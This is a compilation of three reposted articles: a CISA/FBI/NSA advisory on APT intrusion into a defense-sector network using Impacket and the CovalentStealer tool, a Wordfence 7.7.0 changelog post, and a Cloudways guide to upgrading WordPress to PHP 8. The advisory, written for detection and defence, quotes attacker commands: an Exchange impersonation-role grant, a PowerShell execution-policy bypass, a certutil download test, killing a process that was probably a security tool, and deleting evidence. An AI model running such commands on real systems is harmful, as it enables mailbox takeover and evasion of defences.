Alert (AA22-277A) Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization

Summary

Actions to Help Protect Against APT Cyber Activity:

• Enforce multifactor authentication (MFA) on all user accounts.
• Implement network segmentation to separate network segments based on role and functionality.
• Update software, including operating systems, applications, and firmware, on network assets.
• Audit account usage.

From November 2021 through January 2022, the Cybersecurity and Infrastructure Security Agency (CISA) responded to advanced persistent threat (APT) activity on a Defense Industrial Base (DIB) Sector organization’s enterprise network. During incident response activities, CISA uncovered that likely multiple APT groups compromised the organization’s network, and some APT actors had long-term access to the environment. APT actors used an open-source toolkit called Impacket to gain their foothold within the environment and further compromise the network, and also used a custom data exfiltration tool, CovalentStealer, to steal the victim’s sensitive data.

This joint Cybersecurity Advisory (CSA) provides APT actors tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) identified during the incident response activities by CISA and a third-party incident response organization. The CSA includes detection and mitigation actions to help organizations detect and prevent related APT activity. CISA, the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) recommend DIB sector and other critical infrastructure organizations implement the mitigations in this CSA to ensure they are managing and reducing the impact of cyber threats to their networks.

Download the PDF version of this report: pdf, 692 KB

For a downloadable copy of IOCs, see the following files:

Technical Details

Threat Actor Activity

NoteThis advisory uses the MITRE ATT&CK® for Enterprise framework, version 11. See the MITRE ATT&CK Tactics and Techniques section for a table of the APT cyber activity mapped to MITRE ATT&CK for Enterprise framework.

From November 2021 through January 2022, CISA conducted an incident response engagement on a DIB Sector organization’s enterprise network. The victim organization also engaged a third-party incident response organization for assistance. During incident response activities, CISA and the trusted –third-party identified APT activity on the victim’s network.

Some APT actors gained initial access to the organization’s Microsoft Exchange Server as early as mid-January 2021. The initial access vector is unknown. Based on log analysis, the actors gathered information about the exchange environment and performed mailbox searches within a four-hour period after gaining access. In the same period, these actors used a compromised administrator account (“Admin 1”) to access the EWS Application Programming Interface (API). In early February 2021, the actors returned to the network and used Admin 1 to access EWS API again. In both instances, the actors used a virtual private network (VPN).

Four days later, the APT actors used Windows Command Shell over a three-day period to interact with the victim’s network. The actors used Command Shell to learn about the organization’s environment and to collect sensitive data, including sensitive contract-related information from shared drives, for eventual exfiltration. The actors manually collected files using the command-line tool, WinRAR. These files were split into approximately 3MB chunks located on the Microsoft Exchange server within the CU2\he\debug directory. See Appendix: Windows Command Shell Activity for additional information, including specific commands used.

During the same period, APT actors implanted Impacket, a Python toolkit for programmatically constructing and manipulating network protocols, on another system. The actors used Impacket to attempt to move laterally to another system.

In early March 2021, APT actors exploited CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 to install 17 China Chopper webshells on the Exchange Server. Later in March, APT actors installed HyperBro on the Exchange Server and two other systems. For more information on the HyperBro and webshell samples, see CISA MAR-10365227-2 and -3.

In April 2021, APT actors used Impacket for network exploitation activities. See the Use of Impacket section for additional information. From late July through mid-October 2021, APT actors employed a custom exfiltration tool, CovalentStealer, to exfiltrate the remaining sensitive files. See the Use of Custom Exfiltration Tool: CovalentStealer section for additional information.

APT actors maintained access through mid-January 2022, likely by relying on legitimate credentials.

Use of Impacket

CISA discovered activity indicating the use of two Impacket tools: wmiexec.py and smbexec.py. These tools use Windows Management Instrumentation (WMI) and Server Message Block (SMB) protocol, respectively, for creating a semi-interactive shell with the target device. Through the Command Shell, an Impacket user with credentials can run commands on the remote device using the Windows management protocols required to support an enterprise network.

The APT cyber actors used existing, compromised credentials with Impacket to access a higher privileged service account used by the organization’s multifunctional devices. The threat actors first used the service account to remotely access the organization’s Microsoft Exchange server via Outlook Web Access (OWA) from multiple external IP addresses; shortly afterwards, the actors assigned the Application Impersonation role to the service account by running the following PowerShell command for managing Exchange:

powershell add-pssnapin *exchange*;New-ManagementRoleAssignment – name:”Journaling-Logs” -Role:ApplicationImpersonation -User:<account>

This command gave the service account the ability to access other users’ mailboxes.

The APT cyber actors used virtual private network (VPN) and virtual private server (VPS) providers, M247 and SurfShark, as part of their techniques to remotely access the Microsoft Exchange server. Use of these hosting providers, which serves to conceal interaction with victim networks, are common for these threat actors. According to CISA’s analysis of the victim’s Microsoft Exchange server Internet Information Services (IIS) logs, the actors used the account of a former employee to access the EWS. EWS enables access to mailbox items such as email messages, meetings, and contacts. The source IP address for these connections is mostly from the VPS hosting provider, M247.

Use of Custom Exfiltration Tool: CovalentStealer

The threat actors employed a custom exfiltration tool, CovalentStealer, to exfiltrate sensitive files.

CovalentStealer is designed to identify file shares on a system, categorize the files, and upload the files to a remote server. CovalentStealer includes two configurations that specifically target the victim’s documents using predetermined files paths and user credentials. CovalentStealer stores the collected files on a Microsoft OneDrive cloud folder, includes a configuration file to specify the types of files to collect at specified times and uses a 256-bit AES key for encryption. See CISA MAR-10365227-1 for additional technical details, including IOCs and detection signatures.

MITRE ATT&CK Tactics and Techniques

MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. CISA uses the ATT&CK Framework as a foundation for the development of specific threat models and methodologies. Table 1 lists the ATT&CK techniques employed by the APT actors.

Initial Access
Technique TitleIDUse
Valid AccountsT1078Actors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. In this case, they exploited an organization’s multifunctional device domain account used to access the organization’s Microsoft Exchange server via OWA.
Execution
Technique TitleIDUse
Windows Management InstrumentationT1047Actors used Impacket tools wmiexec.py and smbexec.py to leverage Windows Management Instrumentation and execute malicious commands.
Command and Scripting InterpreterT1059Actors abused command and script interpreters to execute commands.
Command and Scripting Interpreter: PowerShellT1059.001Actors abused PowerShell commands and scripts to map shared drives by specifying a path to one location and retrieving the items from another. See Appendix: Windows Command Shell Activity for additional information.
Command and Scripting Interpreter: Windows Command ShellT1059.003Actors abused the Windows Command Shell to learn about the organization’s environment and to collect sensitive data. See Appendix: Windows Command Shell Activity for additional information, including specific commands used.The actors used Impacket tools, which enable a user with credentials to run commands on the remote device through the Command Shell.
Command and Scripting Interpreter: PythonT1059.006The actors used two Impacket tools: wmiexec.py and smbexec.py.
Shared ModulesT1129Actors executed malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths.
System ServicesT1569Actors abused system services to execute commands or programs on the victim’s network.
Persistence
Technique TitleIDUse
Valid AccountsT1078Actors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.
Create or Modify System ProcessT1543Actors were observed creating or modifying system processes.
Privilege Escalation
Technique TitleIDUse
Valid AccountsT1078Actors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. In this case, they exploited an organization’s multifunctional device domain account used to access the organization’s Microsoft Exchange server via OWA.
Defense Evasion
Technique TitleIDUse
Masquerading: Match Legitimate Name or LocationT1036.005Actors masqueraded the archive utility WinRAR.exe by renaming it VMware.exe to evade defenses and observation.
Indicator Removal on HostT1070Actors deleted or modified artifacts generated on a host system to remove evidence of their presence or hinder defenses.
Indicator Removal on Host: File DeletionT1070.004Actors used the del.exe command with the /f parameter to force the deletion of read-only files with the *.rar and tempg* wildcards.
Valid AccountsT1078Actors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. In this case, they exploited an organization’s multifunctional device domain account used to access the organization’s Microsoft Exchange server via OWA.
Virtualization/Sandbox Evasion: System ChecksT1497.001Actors used Windows command shell commands to detect and avoid virtualization and analysis environments. See Appendix: Windows Command Shell Activity for additional information.
Impair Defenses: Disable or Modify ToolsT1562.001Actors used the taskkill command to probably disable security features. CISA was unable to determine which application was associated with the Process ID.
Hijack Execution FlowT1574Actors were observed using hijack execution flow.
Discovery
Technique TitleIDUse
System Network Configuration DiscoveryT1016Actors used the systeminfo command to look for details about the network configurations and settings and determine if the system was a VMware virtual machine.The threat actor used route print to display the entries in the local IP routing table.
System Network Configuration Discovery: Internet Connection DiscoveryT1016.001Actors checked for internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways.
System Owner/User DiscoveryT1033Actors attempted to identify the primary user, currently logged in user, set of users that commonly use a system, or whether a user is actively using the system.
System Network Connections DiscoveryT1049Actors used the netstat command to display TCP connections, prevent hostname determination of foreign IP addresses, and specify the protocol for TCP.
Process DiscoveryT1057Actors used the tasklist command to get information about running processes on a system and determine if the system was a VMware virtual machine.The actors used tasklist.exe and find.exe to display a list of applications and services with their PIDs for all tasks running on the computer matching the string “powers.”
System Information DiscoveryT1082Actors used the ipconfig command to get detailed information about the operating system and hardware and determine if the system was a VMware virtual machine.
File and Directory DiscoveryT1083Actors enumerated files and directories or may search in specific locations of a host or network share for certain information within a file system.
Virtualization/Sandbox Evasion: System ChecksT1497.001Actors used Windows command shellcommands to detect and avoid virtualization and analysis environments.
Lateral Movement
Technique TitleIDUse
Remote Services: SMB/Windows Admin SharesT1021.002Actors used Valid Accounts to interact with a remote network share using Server Message Block (SMB) and then perform actions as the logged-on user.
Collection
Technique TitleIDUse
Archive Collected Data: Archive via UtilityT1560.001Actor used PowerShell commands and WinRAR to compress and/or encrypt collected data prior to exfiltration.
Data from Network Shared DriveT1039Actors likely used net share command to display information about shared resources on the local computer and decide which directories to exploit, the powershell dircommand to map shared drives to a specified path and retrieve items from another, and the ntfsinfo command to search network shares on computers they have compromised to find files of interest.The actors used dir.exe to display a list of a directory’s files and subdirectories matching a certain text string.
Data Staged: Remote Data StagingT1074.002The actors split collected files into approximately
3 MB chunks located on the Exchange server within the CU2\he\debug directory.
Command and Control
Technique TitleIDUse
Non-Application Layer ProtocolT1095Actors used a non-application layer protocol for communication between host and Command and Control (C2) server or among infected hosts within a network.
Ingress Tool TransferT1105Actors used the certutil command with three switches to test if they could download files from the internet.The actors employed CovalentStealer to exfiltrate the files.
ProxyT1090Actors are known to use VPN and VPS providers, namely M247 and SurfShark, as part of their techniques to access a network remotely.
Exfiltration
Technique TitleIDUse
Schedule TransferT1029Actors scheduled data exfiltration to be performed only at certain times of day or at certain intervals and blend traffic patterns with normal activity.
Exfiltration Over Web Service: Exfiltration to Cloud StorageT1567.002The actor’s CovalentStealer tool stores collected files on a Microsoft OneDrive cloud folder.

DETECTION

Given the actors’ demonstrated capability to maintain persistent, long-term access in compromised enterprise environments, CISA, FBI, and NSA encourage organizations to:

  • Monitor logs for connections from unusual VPSs and VPNs. Examine connection logs for access from unexpected ranges, particularly from machines hosted by SurfShark and M247.
  • Monitor for suspicious account use (e.g., inappropriate or unauthorized use of administrator accounts, service accounts, or third-party accounts). To detect use of compromised credentials in combination with a VPS, follow the steps below:
    • Review logs for “impossible logins,” such as logins with changing username, user agent strings, and IP address combinations or logins where IP addresses do not align to the expected user’s geographic location.
    • Search for “impossible travel,” which occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses in the time between logins). Note: This detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting to networks.
    • Search for one IP used across multiple accounts, excluding expected logins.
      • Take note of any M247-associated IP addresses used along with VPN providers (e.g., SurfShark). Look for successful remote logins (e.g., VPN, OWA) for IPs coming from M247- or using SurfShark-registered IP addresses.
    • Identify suspicious privileged account use after resetting passwords or applying user account mitigations.
    • Search for unusual activity in typically dormant accounts.
    • Search for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity.
  • Review the YARA rules provided in MAR-10365227-1 to assist in determining whether malicious activity has been observed.
  • Monitor for the installation of unauthorized software, including Remote Server Administration Tools (e.g., psexec, RdClient, VNC, and ScreenConnect).
  • Monitor for anomalous and known malicious command-line use. See Appendix: Windows Command Shell Activity for commands used by the actors to interact with the victim’s environment.
  • Monitor for unauthorized changes to user accounts (e.g., creation, permission changes, and enabling a previously disabled account).

CONTAINMENT AND REMEDIATION

Organizations affected by active or recently active threat actors in their environment can take the following initial steps to aid in eviction efforts and prevent re-entry:

  • Report the incident. Report the incident to U.S. Government authorities and follow your organization’s incident response plan.
  • Reset all login accounts. Reset all accounts used for authentication since it is possible that the threat actors have additional stolen credentials. Password resets should also include accounts outside of Microsoft Active Directory, such as network infrastructure devices and other non-domain joined devices (e.g., IoT devices).
  • Monitor SIEM logs and build detections. Create signatures based on the threat actor TTPs and use these signatures to monitor security logs for any signs of threat actor re-entry.
  • Enforce MFA on all user accounts. Enforce phishing-resistant MFA on all accounts without exception to the greatest extent possible.
  • Follow Microsoft’s security guidance for Active DirectoryBest Practices for Securing Active Directory.
  • Audit accounts and permissions. Audit all accounts to ensure all unused accounts are disabled or removed and active accounts do not have excessive privileges. Monitor SIEM logs for any changes to accounts, such as permission changes or enabling a previously disabled account, as this might indicate a threat actor using these accounts.
  • Harden and monitor PowerShell by reviewing guidance in the joint Cybersecurity Information Sheet—Keeping PowerShell: Security Measures to Use and Embrace.

Mitigations

Mitigation recommendations are usually longer-term efforts that take place before a compromise as part of risk management efforts, or after the threat actors have been evicted from the environment and the immediate response actions are complete. While some may be tailored to the TTPs used by the threat actor, recovery recommendations are largely general best practices and industry standards aimed at bolstering overall cybersecurity posture.

Segment Networks Based on Function

  • Implement network segmentation to separate network segments based on role and functionality. Proper network segmentation significantly reduces the ability for ransomware and other threat actor lateral movement by controlling traffic flows between—and access to—various subnetworks. (See CISA’s Infographic on Layering Network Security Through Segmentation and NSA’s Segment Networks and Deploy Application-Aware Defenses.)
  • Isolate similar systems and implement micro-segmentation with granular access and policy restrictions to modernize cybersecurity and adopt Zero Trust (ZT) principles for both network perimeter and internal devices. Logical and physical segmentation are critical to limiting and preventing lateral movement, privilege escalation, and exfiltration.

Manage Vulnerabilities and Configurations

  • Update softwareincluding operating systemsapplicationsand firmwareon network assets. Prioritize patching known exploited vulnerabilities and critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment.
  • Implement a configuration change control process that securely creates device configuration backups to detect unauthorized modifications. When a configuration change is needed, document the change, and include the authorization, purpose, and mission justification. Periodically verify that modifications have not been applied by comparing current device configurations with the most recent backups. If suspicious changes are observed, verify the change was authorized.

Search for Anomalous Behavior

  • Use cybersecurity visibility and analytics tools to improve detection of anomalous behavior and enable dynamic changes to policy and other response actions. Visibility tools include network monitoring tools and host-based logs and monitoring tools, such as an endpoint detection and response (EDR) tool. EDR tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
  • Monitor the use of scripting languages (e.g., Python, Powershell) by authorized and unauthorized users. Anomalous use by either group may be indicative of malicious activity, intentional or otherwise.

Restrict and Secure Use of Remote Admin Tools

  • Limit the number of remote access tools as well as who and what can be accessed using them. Reducing the number of remote admin tools and their allowed access will increase visibility of unauthorized use of these tools.
  • Use encrypted services to protect network communications and disable all clear text administration services(e.g., Telnet, HTTP, FTP, SNMP 1/2c). This ensures that sensitive information cannot be easily obtained by a threat actor capturing network traffic.

Implement a Mandatory Access Control Model

  • Implement stringent access controls to sensitive data and resources. Access should be restricted to those users who require access and to the minimal level of access needed.

Audit Account Usage

  • Monitor VPN logins to look for suspicious access (e.g., logins from unusual geo locations, remote logins from accounts not normally used for remote access, concurrent logins for the same account from different locations, unusual times of the day).
  • Closely monitor the use of administrative accounts. Admin accounts should be used sparingly and only when necessary, such as installing new software or patches. Any use of admin accounts should be reviewed to determine if the activity is legitimate.
  • Ensure standard user accounts do not have elevated privileges Any attempt to increase permissions on standard user accounts should be investigated as a potential compromise.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA, FBI, and NSA recommend exercising, testing, and validating your organization’s security program against threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA, FBI, and NSA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 1).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze the performance of your detection and prevention technologies.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA, FBI, and NSA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

CISA offers several no-cost scanning and testing services to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. See cisa.gov/cyber-hygiene-services.

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov.

ACKNOWLEDGEMENTS

CISA, FBI, and NSA acknowledge Mandiant for its contributions to this CSA.

APPENDIX: WINDOWS COMMAND SHELL ACTIVITY

Over a three-day period in February 2021, APT cyber actors used Windows Command Shell to interact with the victim’s environment. When interacting with the victim’s system and executing commands, the threat actors used /q and /c parameters to turn the echo off, carry out the command specified by a string, and stop its execution once completed.

On the first day, the threat actors consecutively executed many commands within the Windows Command Shell to learn about the organization’s environment and to collect sensitive data for eventual exfiltration (see Table 2).

CommandDescription / Use
net shareUsed to create, configure, and delete network shares from the command-line.[1] The threat actor likely used this command to display information about shared resources on the local computer and decide which directories to exploit.
powershell dirAn alias (shorthand) for the PowerShell Get-ChildItem cmdlet. This command maps shared drives by specifying a path to one location and retrieving the items from another.[2] The threat actor added additional switches (aka options, parameters, or flags) to form a “one liner,” an expression to describe commonly used commands used in exploitation: powershell dir -recurse -path e:\<redacted>|select fullname,length|export-csv c:\windows\temp\temp.txt. This particular command lists subdirectories of the target environment when.
systeminfoDisplays detailed configuration information [3], tasklist – lists currently running processes [4], and ipconfig – displays all current Transmission Control Protocol (TCP)/IP network configuration values and refreshes Dynamic Host Configuration Protocol (DHCP) and Domain Name System (DNS) settings, respectively [5]. The threat actor used these commands with specific switches to determine if the system was a VMware virtual machine: systeminfo > vmware & date /T, tasklist /v > vmware & date /T, and ipconfig /all >> vmware & date /.
route printUsed to display and modify the entries in the local IP routing table. [6] The threat actor used this command to display the entries in the local IP routing table.
netstatUsed to display active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics, and IPv6 statistics.[7] The threat actor used this command with three switches to display TCP connections, prevent hostname determination of foreign IP addresses, and specify the protocol for TCP: netstat -anp tcp.
certutilUsed to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.[8] The threat actor used this command with three switches to test if they could download files from the internet: certutil -urlcache -split -f https://microsoft.com temp.html.
pingSends Internet Control Message Protocol (ICMP) echoes to verify connectivity to another TCP/IP computer.[9] The threat actor used ping -n 2 apple.com to either test their internet connection or to detect and avoid virtualization and analysis environments or network restrictions.
taskkillUsed to end tasks or processes.[10] The threat actor used taskkill /F /PID 8952 to probably disable security features. CISA was unable to determine what this process was as the process identifier (PID) numbers are dynamic.
PowerShell Compress-Archive cmdletUsed to create a compressed archive or to zip files from specified files and directories.[11] The threat actor used parameters indicating shared drives as file and folder sources and the destination archive as zipped files. Specifically, they collected sensitive contract-related information from the shared drives.

On the second day, the APT cyber actors executed the commands in Table 3 to perform discovery as well as collect and archive data.

CommandDescription / Use
ntfsinfo.exeUsed to obtain volume information from the New Technology File System (NTFS) and to print it along with a directory dump of NTFS meta-data files.[12]
WinRAR.exeUsed to compress files and subsequently masqueraded WinRAR.exe by renaming it VMware.exe.[13]

On the third day, the APT cyber actors returned to the organization’s network and executed the commands in Table 4.

CommandDescription / Use
powershell -ep bypass import-module .\vmware.ps1;export-mft -volume eThreat actors ran a PowerShell command with parameters to change the execution mode and bypass the Execution Policy to run the script from PowerShell and add a module to the current section: powershell -ep bypass import-module .\vmware.ps1;export-mft -volume e. This module appears to acquire and export the Master File Table (MFT) for volume E for further analysis by the cyber actor.[14]
set.exeUsed to display the current environment variable settings.[15] (An environment variable is a dynamic value pointing to system or user environments (folders) of the system. System environment variables are defined by the system and used globally by all users, while user environment variables are only used by the user who declared that variable and they override the system environment variables (even if the variables are named the same).
dir.exeUsed to display a list of a directory’s files and subdirectories matching the eagx* text string, likely to confirm the existence of such file.
tasklist.exe and find.exeUsed to display a list of applications and services with their PIDs for all tasks running on the computer matching the string “powers”.[16][17][18]
ping.exeUsed to send two ICMP echos to amazon.com. This could have been to detect or avoid virtualization and analysis environments, circumvent network restrictions, or test their internet connection.[19]
del.exe with the /f parameterUsed to force the deletion of read-only files with the *.rar and tempg* wildcards.[20]

References

[1] Microsoft Net Share

[2] Microsoft Get-ChildItem

[3] Microsoft systeminfo

[4] Microsoft tasklist

[5] Microsoft ipconfig

[6] Microsoft Route

[7] Microsoft netstat

[8] Microsoft certutil

[9] Microsoft ping

[10] Microsoft taskkill

[11] Microsoft Compress-Archive

[12] NTFSInfo v1.2

[13] rarlab

[14] Microsoft Import-Module

[15] Microsoft set (environment variable)

[16] Microsoft tasklist

[17] Mitre ATT&CK – Sofware: TaskList

[18] Microsoft find

[19] Microsoft ping

[20] Microsoft del

Revisions

October 4, 2022: Initial version

Source :
https://www.cisa.gov/uscert/ncas/alerts/aa22-277a

Wordfence 7.7.0 Is Out! Here Are The Changes

Wordfence 7.7.0 has just been released and as usual, it includes several awesome enhancements and updates for our security conscious WordPress publishers and e-commerce websites. This post goes into a little more detail on each change we’ve included. We don’t usually post additional detail like this, and we thought we’d give it a try, and make it a routine if the community approves.

This is based on the official Wordfence 7.7.0 changelog, which is included below. The format I’ve used here is the changelog entry as a heading and some detail on what the entry means and some background where applicable.

Improvement: Added configurable scan resume functionality to prevent scan failures on sites with intermittent connectivity issues

We’ve added “scan resume” functionality which is configurable and will prevent security scan failures on sites that might have intermittent connectivity issues. As you know Wordfence runs on over 4 million websites on over 12,000 unique networks, and to say that we run in a range of environments and configurations is an understatement. Our quality assurance team has an oversized influence on the product, and this is one more way they have made Wordfence even more robust in version 7.7.0.

Improvement: Added new scan result for vulnerabilities found in plugins that do not have patched versions available via WordPress.org

This adds a scan result for plugins that have a vulnerability and are still present in the official WordPress plugin repository, and where there is no fix available. The usual course of action is that the plugin team will disable a plugin in the repository that has a known vulnerability, where the vulnerability has not been fixed yet. In some cases, this doesn’t happen, and this scan result is designed to deal with this unusual case. This change will also allow plugins that are not provided through wordpress.org to be flagged as vulnerable if there is no update available.

Improvement: Implemented stand-alone MMDB reader for IP address lookups to prevent plugin conflicts and support additional PHP versions

We use the Maxmind database internally for location lookups. Our code was using the Maxmind PHP library to perform these lookups. Maxmind stopped supporting older PHP versions a while ago, but many of our customers are still on those old versions. We have also found that other WordPress plugins may use a different version of the Maxmind library, which can lead to conflicts. So we’ve rolled our own stand-alone MMDB reader to resolve both of these issues. We now support older PHP versions than the official Maxmind library, and you won’t see any conflicts if another plugin is using the Maxmind library.

Improvement: Added option to disable looking up IP address locations via the Wordfence API

By default Wordfence contacts our servers to perform an IP address location lookup. This is just the way the plugin was originally engineered (by me actually) to try to move as much processing to our own servers and reduce resource usage on our customer websites. Some of our customers prefer that lookup to happen locally, so we’ve provided that option. The default is still to do the lookup on our servers, but you have the option to enable local lookups. The one downside of enabling this feature is that you’ll only get country-level lookups.

Improvement: Prevented successful logins from resetting brute force counters

Another design decision I made early on is that a successful login on a WordPress website would reset our brute-force login counters to zero. This made sense because if a real user makes multiple login failures and then succeeds, clearly they’re the real user and we should reset our counters so that their next failure doesn’t lock them out. Well, an unintended side effect of this is that a threat actor can register an account on WordPress websites with open registration, and sign in, and that would reset brute force counters to zero, so they can keep trying to guess that admin account’s password. We’ve fixed this by removing the reset that occurs on successful login.

Improvement: Clarified IPv6 diagnostic

We found that a message on our diagnostics page caused users to think they need to fix something related to IPv6. So we clarified the message to prevent our customers from going on wild goose chases trying to fix something that doesn’t need fixing.

Improvement: Included maximum number of days in live traffic option text

This is also a clarification. The maximum amount of data in live traffic that we store is 30 days. This wasn’t clear and some users would enter a larger number of days, expecting to see more than 30 days of data. We’ve fixed this user interface issue to make it clear.

Fix: Made timezones consistent on firewall page

When the page showing firewall activity loaded more results, they’d be in UTC time instead of your correct timezone. Oops! We fixed that little issue.

Fix: Added “Use only IPv4 to start scans” option to search

We have the ability to search your Wordfence options page which is super useful. This option was not included in the search, so we fixed that.

Fix: Prevented deprecation notices on PHP 8.1 when emailing the activity log

PHP 8.1 provides notices that a function has been deprecated if a developer (like us) is using an older function call. We were in this case, and PHP 8.1 was rightfully complaining about it. So we switched to a more modern version of the same code.

Fix: Prevented warning on PHP 8 related to process owner diagnostic

On our diagnostics page, if a hosting provider has restricted an account from seeing its own username, our customers would see a warning that you can’t access an array offset on a boolean. We fixed that.

Fix: Prevented PHP Code Sniffer false positive related to T_BAD_CHARACTER

We use PHP code sniffer to look for things that are incompatible between versions. We were getting a false positive when using this internal tool, so we fixed that. This change is really for the benefit of our engineering team.

Fix: Removed unsupported beta feed option

A long time ago when there was fire in the sky and the seas were boiling, we launched the first version of the Wordfence firewall. Because we wanted to test out new rules, and some of our users were brave enough to try the new stuff, we included this option. We would release beta firewall rules and malware signatures, and our brave testing community would try them out first by enabling this option. We do all our testing internally now and the firewall code and rule syntax has become extremely robust, so we don’t do these kinds of releases anymore. So we removed this configuration option.

Below I’ve included the short version of the changelog that you’ll see on WordPress.org. You’re most welcome to post your comments and questions below. Keep in mind that support questions are best posted via our official support channels, but if you’d like to chat about this post, comment below and a member of the team or I will reply if needed.

Regards,

Mark Maunder – Wordfence Founder & CEO

Wordfence 7.7.0 – OCTOBER 3, 2022

  • Improvement: Added configurable scan resume functionality to prevent scan failures on sites with intermittent connectivity issues
  • Improvement: Added new scan result for vulnerabilities found in plugins that do not have patched versions available via WordPress.org
  • Improvement: Implemented stand-alone MMDB reader for IP address lookups to prevent plugin conflicts and support additional PHP versions
  • Improvement: Added option to disable looking up IP address locations via the Wordfence API
  • Improvement: Prevented successful logins from resetting brute force counters
  • Improvement: Clarified IPv6 diagnostic
  • Improvement: Included maximum number of days in live traffic option text
  • Fix: Made timezones consistent on firewall page
  • Fix: Added “Use only IPv4 to start scans” option to search
  • Fix: Prevented deprecation notices on PHP 8.1 when emailing the activity log
  • Fix: Prevented warning on PHP 8 related to process owner diagnostic
  • Fix: Prevented PHP Code Sniffer false positive related to T_BAD_CHARACTER
  • Fix: Removed unsupported beta feed option

    Source :
    https://www.wordfence.com/blog/2022/10/wordfence-7-7-0-is-out-here-are-the-changes/

PHP 8: How to Update the PHP Version of Your WordPress Site

Considered one of the most beginner-friendly programming languages, PHP continues to introduce tremendous changes with each of its updates. Embracing the change, this blog is focused on the steps to upgrade to PHP 8.0 on a WordPress website.

Previously, PHP 7’s speed optimization update helped a lot with gaining higher rankings on the SERPs. Carrying the legacy forward, PHP surprised its enthusiasts with a release of PHP 8.0 back in November 2020, which brought a list of new features that revolutionized the way programmers worked.

PHP 8 lets you write concise code and build more exemplary applications with exciting changes and improvements to the earlier RFCs. Considering the new improvements, it would be a crime not to upgrade your current PHP version to PHP 8.0 on your WordPress site.

Table of Contents

Before we jump towards the steps to upgrade your PHP version to PHP 8 on WordPress, we will give a brief PHP 8.0 overview to help you get acquainted with the update.

PHP 8.0 – An Overview

PHP (an acronym for Hypertext Preprocessor) is a popular open-source scripting language used by coders worldwide for web and application development. This high-level programming language is easy to learn, hence preferred by starters and novice coders. Still, it is also complex enough to cater to the needs of a professional programmer.

PHP 8.0 is the latest update of PHP and has come up with new features, functions, and methods to facilitate the developers and provide the best user experience.

Previously, PHP had released 7.4 in November 2019, ending the support of PHP 7.1. The later version, 7.2, was also discontinued with the release of 8.0. Currently, PHP supports only 7.3, 7.4, and 8.0 versions.

Managed WordPress Hosting Starting From $10/Month

Experience Faster WordPress Themes’ Performance & Constant Availability on Cloudways.

TRY 3 DAYS FREE

PHP 8 Compatibility With WordPress

With every update come compatibility issues. If you want to have a hassle-free PHP 8.0 experience, we recommend opting for the latest WordPress version or going with at least 5.6 or any later versions.

Are you running your website on an older WordPress version but are skeptical about upgrading in fear of getting errors? Don’t worry; you can test your website via a staging environment and proceed with upgrading your live website safely to a newer WordPress version.

If you get any errors in the staging environment, then we’d recommend getting the help of a professional WordPress developer to diagnose and debug the errors before you move ahead with the update.

PHP 8 – Themes & Plugins Compatibility

Discomforts accompany every change; similar is the case with PHP 8. While PHP 8 offers extensive features to support its users and provide them with an ideal user experience, it brings the themes and plugins incompatibility issues.

PHP isn’t the player to be blamed here, as the themes and plugins should be updated to work with the latest software versions. If your favorite and irreplaceable plugin or theme is making problems with PHP 8, then try out the following solutions.

  1. Rollback to the previous PHP version. (A boring option)
  2. Contact the theme or plugin’s support team and inform them about the compatibility issues to boost the optimal user experience with the latest versions of both.

PHP 8 on WordPress: Installation Prerequisites

Before upgrading to PHP 8.0, it’s wise to check the current PHP version that your WordPress site is running.

Using an older version? You can upgrade the PHP version to enjoy the new features and improvements. But not so fast! Remember, safety always comes first. When we talk about security, we consider the “what ifs.”

What if your site is not compatible with the latest version, and you end up losing or corrupting your data in the process. Nope, you don’t want that.

Don’t lose hope; you can create a clone of your website to test it on the latest version.

If the clone website works smoothly after upgrading to PHP 8.0, you can move ahead with updating your actual site. This portion will list out the steps to create a clone website to test it under PHP 8.

Clone a Website via Your Web Hosting Provider

Fortunately, managed WordPress hosting solutions like Cloudways allow the users to create their site’s duplicate without dealing with any complexities. Follow the steps below to create your website’s clone via Cloudways.

  • Log in to Cloudways with your credentials.
Log in with Cloudways
  • Select your server, and click the application that you want to clone.
select server
  • Navigate to the bottom, and you will see an orange circle, click it.
  • Click Clone App/Create Staging from the pop-up.
clone app
  • Select your preferred server, then click Continue.
select server to clone app

You will be asked to wait for a few minutes, during which Cloudways will copy your entire website. Now, you are good to experiment on the clone.

Note: Clone App and Create as Staging are different functionalities. Clicking Clone App will only clone your website. Whereas, Create as Staging will sync the live and staged applications to allow you to perform Push/Pull actions on both the replica and live versions.

